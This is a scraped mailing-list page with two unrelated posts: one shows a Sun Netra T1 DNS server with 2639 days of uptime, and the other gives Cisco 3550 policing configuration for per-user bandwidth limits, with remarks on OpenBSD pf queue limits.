Uptimes suck. Here's the biggest I've ever seen in the company I work for:

[EMAIL PROTECTED] ~]$ uname -a
SunOS optg998 5.6 Generic_105181-26 sun4u sparc SUNW,UltraSPARC-IIi-cEngine
[EMAIL PROTECTED] ~]$ uptime
 3:40pm up 2639 day(s), 13:50, 1 user, load average: 0.08, 0.07, 0.06
[EMAIL PROTECTED] ~]$ date
Wed Oct 29 15:45:24 BRST 2008
[EMAIL PROTECTED] ~]$ psrinfo -v
Status of processor 0 as of: 10/29/08 15:41:07
 Processor has been on-line since 08/08/01 00:50:54.
 The sparc processor operates at 440 MHz, and has a sparc floating point processor.
[EMAIL PROTECTED] ~]$ dmesg | tail -5
SUNW,hme0: Using External Transceiver
SUNW,hme0: 100 Mbps half-duplex Link Up
dump on /dev/md/dsk/d50 size 2042608K
SUNW,hme0: Using External Transceiver
SUNW,hme0: full-duplex Link Up

Ok it's not OpenBSD, blame it on me. But what I liked is that this machine has been working for 2639 days and it still blinks green LEDs. The hard disk never gave up either. No errors in dmesg. It's a Netra T1 machine, running our internal DNS server. I think we'll replace it when it dies ;)

On Wed, Oct 29, 2008 at 7:15 AM, Gilles Chehade <[EMAIL PROTECTED]> wrote:

new_guy wrote:

I know. Longest uptime is silly, macho, pointless stuff... but I ran across an old SunOS 2.6 box that had been up for 387 days. It had been hacked. The only reason it was not an open mail relay is that /var was full. So, I thought to myself, "I bet I could run an OpenBSD box for that amount of time or longer without getting hacked and without doing much to it." Just wondering what's the longest OpenBSD uptime some folks on misc have seen? Thanks

It is not the size of your uptime that matters, it is what you do with it.

Gilles
Re: Per User Bandwidth Limiting
Indeed, I believe whilst the c3750 supports traffic-shaping, the c3550 does not.

BTW, instead of assigning a /30 per user, which wastes 75% of your IP address space, try looking at the 'private vlan' IOS command, which should allow you to use much bigger subnets and still control the user-user traffic.

/Pete

On 14 Dec 2008, at 13:10, Marco Matarazzo wrote:

Hi Justin,

I have an ISP situation where there are about 1000 users sitting behind Cisco 3550 switches. Each port is 1 user and is configured with an individual VLAN where each VLAN is assigned a small network subnet and corresponding DHCP scope. The problem is that it seems (so I have been told) that these 3550's will not effectively bandwidth limit at the port level. Incoming bandwidth is limited as configured, but outgoing is not. So, I am looking at a pf solution but google is not turning up any specific information for such a situation.

This is not true. It's more tricky, but you can actually limit both inbound and outbound at the port level, and it's quite effective too.

Of course OpenBSD is capable of that too, but for 1000 vlans you'll have to split the load across multiple firewalls (or multiple clusters of firewalls) since there are hardcoded limits on the number of queues you can create (256 cbqs and 64 hfsc if I remember well, it's been discussed in the past however!)

The config for the 3550 is something like this:

Define the class-maps (all-in and all-out are different because of hardware limitations):

class-map match-any all-out
 match ip dscp default
class-map match-any all-in
 match access-group 100

Define the policy maps:

policy-map 1mbit-in
 class all-in
  police 1024000 192000 exceed-action drop
policy-map 1mbit-out
 class all-out
  police 1024000 192000 exceed-action drop

And apply the policies to the interfaces:

interface FastEthernet0/4
 description CustomerX
 no switchport
 ip address 1.2.3.4 255.255.255.x
 (or if it's a switchport, just "switchport mode access" and then "switchport access vlan x")
 ip rip advertise 3
 no cdp enable
 service-policy input 1mbit-in
 service-policy output 1mbit-out

Also note that this is rate-limiting, not bandwidth shaping, but it may fit your requirements!

Cheers,
]\/[arco